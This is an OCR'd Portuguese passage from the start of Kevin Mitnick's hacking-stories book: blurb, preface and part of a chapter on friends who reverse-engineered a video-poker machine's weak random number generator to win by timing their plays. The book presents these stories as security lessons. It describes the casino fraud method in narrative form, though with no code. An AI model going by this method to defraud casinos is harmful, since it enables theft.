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Quatro colegas limpam Vegas usando 
um computador que cabia no bolso. 
Um adolescente canadense entediado 
ganha acesso a seęao de 
transferencias sem fio de um 
importante banco do Sul dos Estados 
Unidos. Dois garotos sao recrutados 
por um terrorista que tern vfnculos com 
Osama bin Laden para fazer urna 
invasao na Lockheed Martin e na 
Defense Information System Network. 
E essas histórias sao verdadeiras. 

Se voce trabalha na area de 
seguranęa em sua organizaęao e 
gosta de situaęoes tensas cheias de 
espioes e intriga da vida real prepare- 
se para urna leitura excitante. 


Kevin Mitnick, cujas próprias faęanhas 
o tomaram um herói absoluto do 
hacker conta dezenas de histórias 
verdadeiras de invasóes cibemeticas 

— esquemas altamente efetivos, 
cruelmente inventivos, que aceleram a 
pulsaęao enquanto voce se 
surpreende com tanta audacia. Cada 
urna e seguida pela analise 
especializada de Mitnick, que observa 
como o ataque poderia ter sido evitado 

— e ele tern qualificaęóes 
incomparaveis para recomendar 
medidas efetivas de seguranęa. Sendo 
tanto urna lenda no submundo dos 
hackers quanto um generał na guerra 
contra o crime cibemetico, Kevin 
Mitnick possui urna arma que muito 
provavelmente rendera o intruso: o 
conhecimento profundo da mente 
brilhante e tenacidade do hacker. 
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Prefacio 


Os hackers gostam de contar yantagens entre si. E claro que um dos premios seria o direito de se 
gabar de fazer hacking no site web de minha empresa de seguranęa ou em meu sistema pessoal, 

Outro premio seria poder dizer que eles inventaram uma historia de hacker e a contaram para mim 
e para meu co-autor, Bill Simon, de modo tao convincente que caimos e a incluimos neste livro. 

Este foi um desafio fascinante, um jogo de inteligencia que nós dois praticamos por algum tempo, 
enquanto faziamos as entrevistas para o livro. Para a maioria dos repórteres e autores, estabelecer a 
autenticidade de uma pessoa e uma questao razoavelmente rotineira: Esta e realmente a pessoa que 
afirma ser? Esta pessoa esta ou estava realmente trabalhando para a organizaęao que mencionou? 
Esta pessoa ocupa o cargo que diz ter na empresa? Esta pessoa tern documentaęao para comprovar a 
historia e eu posso verificar a validade dos documentos? Ha pessoas com reputaęao que darao 
sustentaęao a historia no todo ou em parte? 

No caso dos hackers, verificar boas intenęoes e complicado. Neste livro sao contadas histórias de 
algumas pessoas que ja estiveram na cadeia e de outras que enffentariam acusaęoes de crime 
qualificado se suas verdadeiras identidades pudessem ser descobertas. Por isso, querer saber o nome 
yerdadeiro delas ou esperar que ofereęam provas e um negócio duvidoso. 

Essas pessoas só revelaram suas histórias porque acreditam em mim, Elas sabem que ja fiz isso e 
se dispuseram a confiar em mim, sabem que nao vou trai-las nem coloca-las em situaęao delicada. 
Assim, apesar dos riscos, muitas apresentam provas tangiyeis de seus hacks. 

No entanto, e possivel — na yerdade, e provavel — que algumas tenham exagerado nos detalhes 
de suas histórias para toma-las mais conyincentes ou tenham inyentado uma historia inteira, mas 
sempre com base em aęóes ousadas que funcionam, a firn de faze-las parecer yerdadeiras. 

Em razao desse risco, fomos cuidadosos para manter um alto grau de confiabilidade. Durante as 
entrevistas, perguntava todos os detalhes tecnicos, pedia explicaęóes mais detalhadas sobre qualquer 
coisa que nao me parecesse muito conyincente e as vezes conferia tudo mais tarde, para yerificar se a 
historia era a mesma ou se a pessoa contava uma versao diferente na segunda vez. Verificava, ainda, 
se ela 'nao conseguia se lembrar' quando questionada sobre uma etapa dificil de executar, omitida da 
historia, ou se simplesmente nao parecia saber o suficiente para fazer o que dizia ter feito. Tentei 
tambem fazer com que explicasse como tinha ido do ponto A ao ponto B. 

Exceto onde obseryado especificamente, todos os entrevistados das principais histórias contadas 
neste livro passaram pelo meu 'teste do faro', Meu co-autor e eu concordamos quanto a credibilidade 
das pessoas cujas histórias incluimos neste livro, No entanto, com ffeqiiencia detalhes foram mudados 
para proteger o hacker e a yitima. Em varias histórias, as identidades de empresas foram encobertas. 
Modifiquei nomes, industrias e localizaęóes. Em alguns casos, ha informaęoes incorre tas para 
proteger a identidade da yitima ou evitar a repetięao do crime. Entretanto, as yulnerabilidades basicas 
e a natureza dos incidentes sao exatas. 

Ao mesmo tempo, uma vez que os projetistas de software e os fabricantes de hardware estao 
continuamente acertando yulnerabilidades de seguranęa por meio de patches e novas yersoes de 



A arte de invadir 


produtos, poucas das exploraęoes ainda funcionam conforme descrito nestas paginas. Isso poderia levar o leitor 
superconfiante a decidir que nao precisa se preocupar, que, com os pontos vulneraveis identificados e corrigidos, ele e 
sua empresa estao seguros. Mas a lięao que essas histórias deixam, quer tenham acontecido ha seis meses, quer ha seis 
anos, e que os hackers estao achando novos pontos vulneraveis todos os dias. Nao leia o livro para descobrir pontos 
vulneraveis especificos em produtos especificos, mas para mudar sua atitude e assumir uma nova postura. 

Leia o livro tambem para se divertir, se espantar e se admirar com as exploraęoes sempre surpreendentes desses 
hackers, que usam a inteligencia com mas intenęoes, 

Algumas sao chocantes e servem de advertencia, outras o farao rir com a ousadia inspirada do hacker. Se voce e 
profissional de seguranęa ou da area de TI, toda historia traz lięoes para voce tomar sua organizaęao mais segura. Se 
voce nao e um profissional, mas gosta de histórias de crime ousadas, arriscadas e que exigem sangue frio, encontrara 
tudo isso aqui. 

Todas essas aventuras envolveram o risco de tiras, agentes do FBI e do Servięo Secreto surpreenderem as pessoas 
em casa com as algemas em maos. E, em inumeros casos, foi exatamente isso o que aconteceu. 

Mas isso ainda pode acontecer. Nao e de admirar que a maioria desses hackers nunca tenha se disposto a contar 
suas histórias antes. A maioria das aventuras que voce vai ler aqui esta sendo publicada pela primeira vez. 
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Por Kevin Mitnick 

Este livro e dedicado a minha familia maravilhosa, aos amigos intimos e sobretudo as pessoas que o 
tomaram possivel — os hackers black-hat* e white-hat**, que contribuiram com suas histórias para nossa 
aprendizagem e nosso entretenimento. 

Escrever A arte de invadir foi um desafio ainda maior que o livro anterior. Em vez de usar nosso talento 
criativo para criar histórias e anedotas que ilustrassem os perigos da engenharia social e o que as empresas 
podem fazer para atenua-los, tanto Bill Simon quanto eu nos baseamos em entrevistas com ex-hackers, phone 
phreaks e hackers que passaram a ser profissionais de seguranęa. Queriamos escrever um livro que fosse tanto 
um suspensę policial quanto um guia para alertar e ajudar as empresas a proteger suas informaęóes valiosas e 
seus recursos de computaęao. Acreditamos que, ao revelar as metodologias e tecnicas comuns usadas por 
hackers para entrar em sistemas e redes, podemos influenciar a comunidade em geral a lidar adequadamente 
com os riscos e as ameaęas impostos por eles. 

Tenho tido a extraordinaria sorte de contar com Bill Simon, autor best-seller, e trabalhamos diligentemente 
juntos neste novo livro. As habilidades de Bill como escritor e sua capacidade magica de tirar informaęóes de 
nossos colaboradores e escreve-las com estilo e de modo que a avó de todo mundo e capaz de entender e 
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livro — foi um amigo fiel que estava la, comigo, durante todo o processo de criaęao. Embora tivessemos alguns 
momentos de frustraęao e diferenęas de opiniao durante a fasę de desenvolvimento, sempre as resolvemos, para 
nossa satisfaęao. Em pouco mais de dois anos, fmalmente conseguirei escrever e publicar The untold story of 
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* Hackers que invadem, danificam, alteram e furtam informaęóes em beneficio próprio (N. da R.T.). 

** Hackers que exploram problemas de seguranęa, descobrem falhas em sistemas e as divulgam abertamente 
para que sejam corrigidas (N. da R.T.). 
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ao trabalho e aos prazos que eu precisava cumprir. Este livro nao teria sido possivel sem seu amor e apoio 
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Minha tia, Chickie Leventhal, sempre teve um lugar especial em meu coraęao. Nos ultimos anos, nossos 
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em seminarios com duraęao de um a dois dias sobre como as empresas podem reconhecer 


XII 



Agradecimentos 


e se defender contra ataąues de engenharia social. Juntos, criamos um programa popular de radio conhecido como The 
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lnvadindo os cassinos por 
um milhao de pratas 

Toda vez que alguem [engenheiro de software] diz: "Ninguem 
se dara ao trabalho de fazer isso", havera sempre alguem na 
Finlandia que vai se dar a esse trabalho. 

Alex Maylleld 


O jogador vive um momento magico, em que emoęoes simples sao exacerbadas e se transformam em 
fantasias 3D — um momento em que a ganancia devora a etica e o sistema de um cassino e apenas mais urna 
montanha a ser conquistada. Nesse exato momento, a ideia de encontrar um modo fraudulento de vencer as 
mesas ou as maquinas nao só surge como tambem tira o fólego. 

Alex Mayfield e tres amigos viveram mais do que um sonho. Como acontece com muitos outros hacks, a 
historia comeęou como um exercicio intelectual só para ver se seria possivel. No finał, os quatro realmente 
yenceram o sistema, tirando "cerca de um milhao de dólares" dos cassinos, diz Alex. 

No inicio da decada de 1990, os quatro trabalhavam como consultores em alta tecnologia e levavam urna 
vida tranquila e descompromissada. "Sabę, voce trabalha, ganha um dinheiro e entao fica sem trabalhar ate ficar 
duro." 

Las Vegas estava longe, um cenario de filmes e programas de televisao. Entao, quando urna empresa de 
tecnologia propós-lhes desenvolver um software e exibi-lo nessa cidade, em urna feira industrial que ocorreria 
em urna conyenęao de alta tecnologia, eles agarraram a oportunidade. Seria a primeira vez que pisariam em 
Vegas, urna chance de ver as luses piscando para eles, e com todas as despesas pagas. Quem recusaria isso? As 
suites indiyiduais em um grandę hotel significayam que a 
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esposa de Alex e a namorada de Mikę poderiam ser incluidas na diversao. Os dois casais, mais Larry e Marco, 
partiram para a diversao em Sin City. 

Alex diz que eles nao entendiam muito de jogo e nao sabiam o que esperar. "Voce sai do aviao e ve todas 
aquelas senhoras jogando nas maquinas. Parece engraęado, irónico, e voce esta la no meio." 

Depois que terminou a feira, os dois casais sentaram-se no cassino do hotel, jogaram em caęa niqueis e 
aproveitaram as cervejas gratis, quando a esposa de Alex lanęou um desafio: 

Estas maąuinas nao sao baseadas em computadores? Voces, que entendem de computadores, nao 
podem fazer alguma coisa para ganharmos mais? 

Entao eles foram para a suitę de Mikę e ficaram la conjecturando sobre como as maquinas poderiam 
funcionar. 

Pesquisa 

Esse foi o gatilho. "Nós quatro ficamos curiosos com tudo aquilo e comeęamos a estudar o assunto quando 
yoltamos para casa", diz Alex, animado com as lembranęas das experiencias vividas naquela fasę criativa. 
Demorou bem pouco para a pesquisa comprovar o que eles ja suspeitavam. "Sim, basicamente sao programas 
de computador. Entao, ficamos interessados em saber: haveria um modo de invadir aquelas maquinas?"* 

Algumas pessoas ja tinham vencido caęa-niqueis "substituindo o firmware" — pegando o chip de 
computador de dentro de urna maquina e substituindo a programaęao por urna versao que garantiria 
compensaęoes muito mais interessantes do que aquelas que o cassino pretendia oferecer. Outras equipes haviam 
conseguido, mas fazer isso implicava o envolvimento de um funcionario do cassino. Mas nao podia ser 
qualquer funcionario, tinha de ser um dos tecnicos dos caęa-niqueis. Para Alex e seus amigos, "trocar ROMs 
seria simples como dar urna pancada na cabeęa de urna senhora e pegar a bolsa dela". Eles acharam que fazer 
isso seria um desafio as suas habilidades de programaęao e ao intelecto. Alem do mais, nao eram muito 
talentosos em engenharia social, apenas entendiam de computador. Faltava-lhes a habilidade para se aproximar 
furtivamente de um funcionario de um cassino e lhe propor participar de um pequeno esquema para ganhar 
algum dinheiro que nao lhe pertencia. 

Mas como eles comeęariam a atacar o problema? Alex explicou: 

Ficamos pensando se poderiamos prever alguma coisa com relaęao a seąiiencia de cartas. Ou 
talvez pudessemos encontrar uma back door* que um programador poderia ter inserido para seu 
próprio beneficio. Todos os programas sao escritos por programadores, e eles gostam de 
aprontar. Achamos que de algum modo seria possivel descobrir uma back door pressionando 
uma seqiiencia de botoes para 


Código de software que permite acesso posterior, nao autorizado, ao programa (N. da R. T.). 
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alterar as probabilidades ou encontrando uma simples falha de programaęao que poderiamos 

explorar. 

Alex leu o livro The eudaemonic pie, de Thomas Bass (Penguin, 1992), que conta a historia de como um 
grupo de peritos em computador e fisicos ganhou na roleta em Las Vegas, na decada de 1980, usando a própria 
inyenęao — um computador 'portatif, do tamanho aproximado de um maęo de cigarros — para prever o 
resultado de um jogo de roleta. Uma pessoa do grupo na mesa clicava botoes para dar a velocidade da roleta e 
conseąuentemente o giro da bola, e o computador transmitia tons por radio para um aparelho de escuta de outro 
membro da eąuipe, que interpretava os sinais e fazia uma boa aposta. Eles deveriam ter saido do cassino com 
uma tonelada de dinheiro, mas nao foi isso o que aconteceu. Na opiniao de Alex, "o esquema deles tinha, 
claramente, um excelente potencial, mas foi afetado por uma tecnologia complicada e nao confiavel. Tambem 
havia muitos participantes, por isso o comportamento e as relaęoes interpessoais eram questoes a serem 
consideradas. Estavamos determinados a nao repetir os erros deles". 

Alex imaginou que seria mais facil vencer o jogo que era fundamentado em computador "porque o 
computador e completamente determinista" — o resultado baseia-se no que ocorreu antes ou, para paraffasear a 
expressao de um velho engenheiro de software, se entram dados bons. saem dados bons. {A expressao original 
considera isso de uma perspectiva negativa: "entra lixo, sai lixo".) 

Esse parecia ser o caminho que ele seguiria. Quando jovem, Alex era musico, tocava numa banda e 
sonhava ser astro do rock. Mas o sonho nao se realizou, e ele passou a se dedicar ao estudo de matematica. 
Tinha talento para a matematica e, embora nunca tivesse ligado muito para os estudos (ele abandonou a 
faculdade), havia estudado o assunto o suficiente para ter um nivel bastante alto de competencia. 

Decidiu que era preciso fazer alguma pesquisa. Viajou para Washington, de para passar um tempo na sala 
de leitura da central de patentes. "Imaginei que alguem poderia ter sido tolo o suficiente para pór todo o código 
na patente" para uma maquina de videopóquer. E ele estava certo. "Na epoca, depositar uma grandę quantidade 
de código-fonte em uma patente era uma maneira de uma pessoa que solicitava uniu patente proteger sua 
inyenęao, visto que o código contem uma descrięao bastante completa dessa inyenęao, mas de um modo que 
nao e muito facil de o usuario entender Consegui alguns microfilmes com o código-fonte e escaneei as paginas 
dos digitos hex das rotinas mais interessantes, que tinham de ser descompilados [em uma forma utilizavel]." 

A analise do código revelou alguns segredos que os quatro acharam intrigantes, mas eles concluiram que o 
unico modo de avanęar realmente seria pór a mao no tipo especifico de maquina que queriam invadir para poder 
descobrir o código. 

Como equipe, eles eram bem entrosados. Mikę era um programador mais do que competente, mais forte 
que os outros em design de hardware. Marco, outro programador inteligente, era emigrante do Leste europeu e 
parecia um adolescente; adorava se arriscar, olhando tudo com jeito de sabichao. Alex destacava-se em 
programaęao e era quem tinha o conhecimento de criptografia de que eles precisavam. Larry nao era muito 
mais do que um programador e, em yirtude de um acedente de moto, nao podia viajar longas distancias, mas era 
um excelente organizador; mantinha o projeto em andamento e todos concentrados no que era necessario ser 
feito em cada etapa. 
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Depois de sua pesąuisa inicial, Alex 'esąueceu' o projeto. Marco, no entanto, estava animado com a ideia. 
Ele continuava insistindo: "Nao e uma coisa tao dificil, ha treze estados onde se podem comprar maąuinas 
legalmente", Finalmente, convenceu os outros a tentar, "Entao, pensamos: 'Mas que diabo!'." Cada um entrou 
com dinheiro suficiente para bancar a viagem e o custo de uma maąuina. Eles voltaram a Vegas, mas dessa vez 
arcando com as despesas e com outro objetivo em mente. 

Alex diz: "Para comprar uma maąuina caęa-niąueis, basicamente voce só precisava ter carteira de 
identidade de um estado onde o uso dessas maąuinas fosse legał. Apresentando uma carteira de motorista do 
estado, eles nem fariam tantas perguntas". Um deles tinha uma ligaęao conveniente com uma pessoa que 
residia em Nevada. "Era tio da namorada de alguem, ou alguma coisa desse tipo, e morava em Vegas." 

Para falar com esse homem, eles escolheram Mikę, porąue "ele tern um jeito de vendedor, e um cara muito 
apresentavel. A suposięao e que voce vai usar a maąuina para um jogo ilegal. I como armas", explicou Alex, 
Muitas maąuinas sao negociadas no mercado negro — vendidas fora dos canais legais — para instituięoes 
como clubes, por exemplo. Ele ainda achou surpreendente que "pudessemos comprar as mesmas unidades de 
produęao usadas no cassino", 

Mikę pagou 1 -500 pratas ao homem por uma maąuina de marca japonesa. "Entao colocamos aąuela coisa 
no carro e fomos para casa como se estivessemos carregando um bebe no assento de tras." 

Desenvolvendo o hack 

Mikę, Alex e Marco levaram a maąuina para a parte de cima de uma casa, onde havia um ąuarto vago. A 
empolgaęao com a experiencia seria lembrada por muito tempo por Alex como um dos momentos mais 
excitantes de sua vida. 

Abrimos, tiramos a ROM fora, imaginamos qual poderia ser o processador. Eu tinha tornado a 
decisao de pegar essa maąuina japonesa que parecia uma cópia barata de uma grandę marca. 
Imaginei que os engenheiros poderiam ter trabalhado sob pressao, que poderiam ter sido um 
pouco preguięosos ou descuidados. E eu estava certo. Eles tinham usado um [chip] 6809, parecido 
com um 6502 que voce via num Apple II ou num Atari. Era um chip de 8 bits com memória de 
64K. Eu era programador de linguagem de montagem, entao isso me era familiar. 

A maąuina que Alex tinha escolhido ja existia ha cerca de dez anos. Sempre que um cassino quer comprar 
uma maąuina com design novo, a Las Vegas Gaming Commission verifica a programaęao para se certificar de 
que os ganhos dos jogadores serao justos. Obter a aprovaęao para um novo modelo pode ser um processo 
demorado, por isso os cassinos acabam mantendo as maąuinas mais antigas por mais tempo do que se imagina. 
Para a eąuipe, uma maąuina mais antiga provavelmente teria uma tecnologia ultrapassada, seria menos 
sofisticada e mais facil de atacar. 

O código que eles transferiram por download do chip estava na forma binaria, a serie de 1 e O, que e o 
nivel mais basico de instruęoes de computador. Para traduzir isso em uma forma com a qual pudessem 
trabalhar, eles primeiro teriam de fazer uma engenharia inversa — um processo 
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usado por um engenheiro ou programador para descobrir como um produto e desenhado; nesse caso, 
significava converter a linguagem da maąuina para outra que a eąuipe pudesse entender e manipular. 

Alex precisava de um descompilador para traduzir o código. Nenhum dos ąuatro ąueria 'sujar as maos' 
tentando comprar o software — um ato que para eles seria o mesmo que ir a urna biblioteca e tentar descobrir 
em livros como se constrói urna bomba- Eles entao criaram seu próprio descompilador, um esforęo que Alex 
descreve dizendo: "Nao e algo que se tira de letra, mas foi divertido e relativamente facil". 

Quando o código da maquina de videopóquer comeęou a passar pelo novo descompilador, os tres 
programadores sentaram-se para transferi-lo. Normalmente, e facil para um bom engenheiro de software 
localizar com rapidez as rotinas de um programa que quer enfocar. Isso porque urna pessoa que esta escrevendo 
um código costuma incluir neles notas, comentarios e observaęóes que explicam a funęao de cada rotina, algo 
parecido com os titulos e subtitulos das seęóes de um capitulo de um livro, 

Quando um programa e compilado numa forma que a maquina pode ler, essas anotaęóes sao ignoradas — o 
computador ou o microprocessador nao precisa delas. Logo, o código que foi invertido nao tern esses 
comentarios uteis. Esse código invertido e como um mapa de ruas ou estradas sem legenda informando o 
significado das placas ou marcaęóes. 

Eles deram urna olhada nas paginas do código na tela, procurando pistas para responder as perguntas 
basicas: "Qual e a lógica? Como as cartas sao embaralhadas? Como as cartas de reposięao sao escolhidas?". 
Mas o foco principal naquela situaęao era localizar o código para o "gerador de numeros aleatórios (GNA)". A 
suposięao de Alex de que os programadores japoneses que escreveram o código para a maquina poderiam ter 
tornado atalhos que deixavam erros no design do gerador de numeros aleatórios estava correta. 

Reescrevendo o código 

Alex parece orgulhoso ao descrever esse esforęo. "Eramos programadores; iramos bons no que faziamos. 
Imaginamos como os numeros no código se transformavam em cartas na maquina e entao escrevemos o 
primeiro código C, que faria a mesma coisa", disse ele, referindo-se a linguagem de programaęao chamada C 

Estavamos motivados e trabalhavamos sem parar. Eu diria que provavelmente 
levamos de duas a tres semanas para ter uma boa noęao do que estava acontecendo 
no código. 

Voce olha para ele, faz algumas suposięóes, escreve um código novo, entra com ele 
na ROM do computador, coloca-a de volta na maquina e ve o que acontece, Faziamos 
coisas como escrever rotinas pelas quais apareceriam numeros hex [hexadecimais] 
na tela, em cima das cartas. Logo tivemos uma visao geral do design, de como o 
código distribuia as cartas. 

Era uma combinaęao de tentatiya e erro e analise top-down; o código comeęou a 
fazer sentido bem rapido. Entao entendemos exatamente como os numeros eram 
processados e viravam cartas na tela. 
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Nossa esperanęa era que o gerador de numeros aleatórios (GNA) fosse relativamente simples. E, 
nesse caso, no inicio da decada de 1990, realmente era. Fiz uma pesąuisa rapida e descobri que 
ele se baseava em alguma coisa que Donald Knuth tinha escrito na decada de 1960. Esses caras 
nao iam inventar nada desse tipo; eles haviam pego pesquisas ja feitas sobre os metodos e coisas 
de Monte Cario e colocado em seu código. 

Imaginamos exatamente que algoritmo eles estayam usando para gerar as cartas; e chamado 
registro de mudanęa de feedback linear, e era um gerador bastante bom de numeros aleatórios. 

Mas logo eles descobriram que o gerador de numeros aleatórios tinha uma falha fatal que facilitaria muito a 
tarefa. Mikę explicou que "era um GNA relativamente simples, de 32 bits, por isso a complexidade 
computacional para quebra-lo estava ao alcance deles, e com algumas boas otimizaęóes isso se tomou quase 
trivial". 

Logo, os numeros produzidos nao eram realmente aleatórios* Mas Alex acha que ha uma boa razao para 
isso: 

Se fossem realmente aleatórios, eles nao conseguiriam estabelecer as probabilidades. Eles Nao 
poderiam verificar quais seriam as verdadeiras probabilidades. Algumas maquinas davam 
flushes seqiienciais reais, e eles Nao podiam acontecer. Os designers querem poder confirmar que 
tem os dados estatisticos certos; do contrario acham que Nao tem controle sobre o jogo. 

Outra coisa que os designers Nao perceberam quando projetaram essa maquina e que eles nao 
precisayam de um gerador de numeros aleatórios. Estatisticamente, ha dez cartas em cada 
distribuięao — as cinco mostradas no inicio e uma alternatiya para cada uma daquelas cinco que 
aparecerao se o jogador preferir descartar. Acontece que, nas primeiras versóes dessas 
maquinas, elas basicamente pegayam aquelas dez cartas de dez numeros seqiienciais aleatórios 
no gerador de numeros aleatórios. 

Logo Alex e seus parceiros entenderam que as instruęóes de programaęao em maquinas de primeira 
geraęao eram pouco elaboradas. E, devido a esses erros, eles perceberam que poderiam escrever um algoritmo 
relativamente simples, mas bastante inteligente, para derrotar a maquina. 

O truque, na opiniao de Alex, seria comeęar um jogo, ver as cartas que apareciam na maquina e introduzir 
os dados no próprio computador em casa para identificar essas cartas. O algoritmo deles calcularia onde estava 
o gerador aleatório e por quantos numeros ele tinha de passar ate estar pronto para a jogada tao procurada, o 
royal flush*. 

Logo estayamos em nossa maquina de teste e executamos nosso pequeno programa, que informa a 
próxima seqiiencia de cartas corretamente. Ficamos muito empolgados. 

* E uma combinaęao do straight com o flush, ou seja, uma seqtiencia completa com canas do mesmo naipe (N.daT.). 
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Alex atribui a empolgaęao daąuele momento ao fato de "saber que se e mais esperto que alguem e por isso 
e possivel vence-lo. E que, em nosso caso, isso nos renderia algum dinheiro". 

Eles foram fazer compras e encontraram um relógio Casio com um cronómetro que poderia marcar 
decimos de segundo- Compraram tres, um para cada rapaz que iria aos cassinos; Larry ficaria operando o 
computador. 

A equipe estava pronta para testar o metodo. Um deles comeęaria aj ogar e gritaria a mao que tivesse — a 
identificaęao e o naipe de cada urna das cinco cartas. Larry introduziria os dados no computador deles; embora 
fosse urna maquina montada, era um tipo popular entre os fanaticos e apreciadores de computador, e ótima para 
aquela finalidade, porque tinha um chip muito mais rapido do que aquele da maquina de videopóquer japonesa. 
Levava apenas alguns minutos para calcular o tempo exato para acertar um dos cronómetros Casio. 

Terminado o tempo, aquele que estivesse na maquina apertaria o botao Play. Mas isso tinha de ser feito 
com exatidao, em urna fraęao de segundos. O que nao era um problema tao grandę quanto parecia, como Alex 
explicou: 

Dois de nós tfnhamos sido musicos por um tempo. Se voce e musico e tem uma noęao razoavel de 

ritmo, pode apertar um botao em mais ou menos cinco milionesimos de segundo. 

Se tudo funcionasse da maneira esperada, a maquina exibiria o royal flush tao desejado. Os dois tentaram 
em sua maquina, praticando ate que todos pudessem acertar o royal flush num numero razoavel de tentativas. 

Nos meses anteriores, eles tinham, nas palavras de Mikę, "invertido a engenharia da operaęao da maquina, 
descoberto exatamente como os numeros aleatórios eram transformados em cartas na tela, precisamente quando 
e com que rapidez o GNA fazia a iteraęao, todas as idiossincrasias relevantes da maquina, e haviam 
desenvolvido um programa para levar todas essas variaveis em consideraęao, de modo que, quando 
soubessemos o estado de determinada maquina num instante exato de tempo, poderiamos prever com alta 
precisao a iteraęao exata do GNA a qualquer momento, nas próximas horas ou mesmo dias". 

Eles tinham vencido a maquina, transformando-a em escrava. Enfrentaram o desafio intelectual de um 
hacker e tiveram sucesso. O conhecimento poderia deixa-los ricos. 

Era divertido sonhar, mas sera que eles poderiam realmente conseguir isso no ambiente complexo de um 
cassino? 

De volta aos cassinos — desta vez para jogar 

Uma coisa e mexer em sua própria maquina, num local privado, seguro. Tentar sentar no meio de um 
cassino lotado e roubar o dinheiro deles — essa e outra historia totalmente diferente. E requer nervos de aęo. 

As moęas acharam que a viagem seria uma aventura- Os rapazes incentivaram-nas a usar saias justas e 
comportar-se de maneira a chamar a atenęao —jogar, conyersar, rir alto, pedir drinques —, 
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esperando que com isso o pessoal da cabine de seguranęa que controlava as cameras se distraisse o maximo 
possivel, lembra-se Alex. 

A esperanęa era que eles se misturassem a multidao. "Mikę era o melhor nisso. Ele estava ficando calvo- 
Ele e sua esposa pareciam jogadores tipicos." 

Alex descreve a cena em detalhes como se tudo tivesse acontecido ontem. Marco e Mikę provavelmente 
fariam um pouco diferentes mas foi assim que funcionou para Alex: com sua esposa, Annie, ele primeiro daria 
urna volta pelo cassino e escolheria urna maquina de videopóquer. Ele precisava saber com muita precisao o 
ciclo de tempo exato da maquina. Para descobrir eles usa-riam um metodo: esconderiam urna camera de video 
numa bolsa e a carregariam no ombro; no cassino, o jogador posicionaria a bolsa de modo que as lentes da 
camera apontassem para a tela do videopóquer e filmassem por um tempo, "Poderia ser complicado", ele 
lembra, "tentar erguer a bolsa na posięao certa sem parecer que era urna posięao foręada. Numa situaęao como 
essa, voce nao quer fazer nada que pareęa suspeito e chame a atenęao". Mikę preferiu outro metodo, menos 
complicado: "O ciclo de tempo de maquinas desconhecidas em funcionamento era calculado lendo-se as cartas 
da tela em dois momentos, com um intervalo de varias horas". Ele tinha de verificar se ninguem tinha jogado 
na maquina nesse periodo, porque isso alteraria o indice de iteraęao. Mas era facil: bastaria conferir se o 
display de cartas era o mesmo de quando ele esteve jogando na maquina, o que geralmente era o caso, visto que 
"maquinas com apostas altas tendiam a nao ser usadas com freqiiencia". 

Ao fazer a segunda leitura das cartas exibidas, ele tambem sincronizaria seu timer. Casio e entao passaria, 
por telefone, os dados do timing da maquina e as seqiiencias de cartas para Larry que entra-ria com os dados no 
computador de base em casa e executaria o programa. Fundamentado naqueles dados, o computador iria 
prever o horario do próximo royal flush. "Voce esperava que fossem horas, as vezes dias", e nesse caso eles 
teriam de comeęar tudo de novo com outra maquina, talvez em outro hotel Nessa fasę, o timing do Casio 
poderia estar defasado em ate um minuto, aproximadamente, mas era próximo o suficiente. 

Voltando bem rapido, caso alguem ja estivesse na maquina-alvo, Alex e Annie retomariam ao cassino e 
dariam um tempo em outras maquinas ate que o jogador saisse. Entao, Alex sentaria para jogar em urna 
maquina, e Annie, na maquina ao lado dele. Eles comeęariam a jogar, demonstrando que estavam se 
divertindo. Entao, como Alex lembra: 

Eu comeęaria a Jogar, cuidadosamente sincronizado com 
meu timer Casio. Quando a mao viesse, eu a memorizaria 

— o valor e o naipe de cada urna das cinco cartas — e continuaria jogando ate ter memorizado 
oito cartas na seqiiencia. Acenaria para minha esposa, perto de mim, e me dirigiria a um telefone 
publico comum fora do cassino. Eu tinha cerca de oito minutos para chegar ao telefone, fazer o 
que era preciso e voltar para a maquina. Minha esposa continuaria a jogar. Se alguem aparecesse 
para usar a maquina, ela lhe diria que seu marido estava sentado la. Tinhamos imaginado um 
modo de fazer uma ligaęao para o pager de Larry e pressionar os numeros no teclado do telefone 
para lhe passar as cartas. Assim, nao teriamos de dize-las em voz alta — os funcionarios do 
cassino estao sempre atentos para ouvir 
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coisas desse tipo. Larry entraria com as cartas no computador e executaria nosso 
programa. 

Entao, eu telefonaria para ele. Larry seguraria o fone na frente do computador, o 
qual daria dois conjuntos de peąuenos tons. No primeiro, eu apertaria o botao Pause 
do timer para interromper a contagem. No segundo, apertaria o Pause novamente 
para reiniciar o timer. 

As cartas que Alex disse a Larry deram ao computador um ajuste exato de onde estava o gerador de 
numeros aleatórios da maąuina. Dando ordem de delay pelo computador, Alex estava fazendo uma 
correęao crucial para o timer Casio, de modo que ele terminaria no momento exato em que o royal flush 
estivesse prestes a aparecer 

Uma vez reiniciado o timer de contagem regressiva, voltei para a maquina. O 
timer comeęou a dar o sinal 'Bipe, bipe, bum', e no exato momento do 'bum' apertei 
novamente o botao Play na maquina. 

Daquela primeira vez, acho que ganhei 36 mil dólares. 

Chegamos a ter um sucesso razoavel porque tudo tinha sido muito bem pianejado 
Quando nao funcionava era porque nao conseguiamos o timing certo. 

Para Alex, a primeira vez que ele ganhou foi "muito excitante, mas assustador. O supervisor de jogo era 
aquele homem com cara de fascista italiano, Tinha certeza de que ele estava olhando para mim de um jeito 
diferente, com aquela expressao de desconfianęa no rosto, talvez porque eu saia para telefonar o tempo todo- 
Acho que ele pode ter subido para ver as fitas". Apesar da tensao, havia uma "excitaęao naquilo". Mikę lembra- 
se de estar "naturalmente nervoso, porque alguem poderia ter notado meu comportamento estranho, mas na 
yerdade ninguem me olhou de um modo estranho. Minha esposa e eu eramos tratados como yencedores tipicos 
de apostas altas — iramos cumprimentados e nos ofereciam muitas fichas gratis". 

O sucesso deles foi tamanho que precisaram se preocupar com a quantidade de dinheiro ganho, pois 
chamaria a atenęao. Eles comeęaram a perceber que enffentavam um problema curioso: o de fazer tanto 
sucesso. "Era um sucesso muito grandę. Estavamos ganhando premios enormes de dezenas de milhares de 
dólares. Um royal flush paga 4.000 para 1; em uma maquina de 5 dólares, sao vinte mil." 

A coisa vai longe. Alguns jogos sao de um tipo chamado cumulatiyo — o premio continua aumentando ate 
que alguem acerte, e eles conseguiram ganhar aquele com muita facilidade. 

Eu ganhei um desses premios de 45 mil dólares. Um tecnico apareceu — provavelmente a mesma 
pessoa que lica por ali e conserta as maquinas. Ele tem uma chave especial que os caras do salao 
nao tem. Ele abre a caixa, tira a płaca [eletrónica] para fora, puxa a ROM para fora la mesmo, na 
sua frente. Ele tem um leitor de BOM que usa para testar o chip da maquina com um golden 
master que e trancado a chave. 
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O teste da ROM foi um procedimento-padrao durante anos, soube Alex, Ele supoe que eles foram 
"ąueimados desse jeito", porąue cal procedimento passou a ser, por fim, largamente utilizado como medida 
defensiva. 

A declaraęao de Alex me fez pensar se os cassinos adotam esse procedimento por causa de alguns caras 
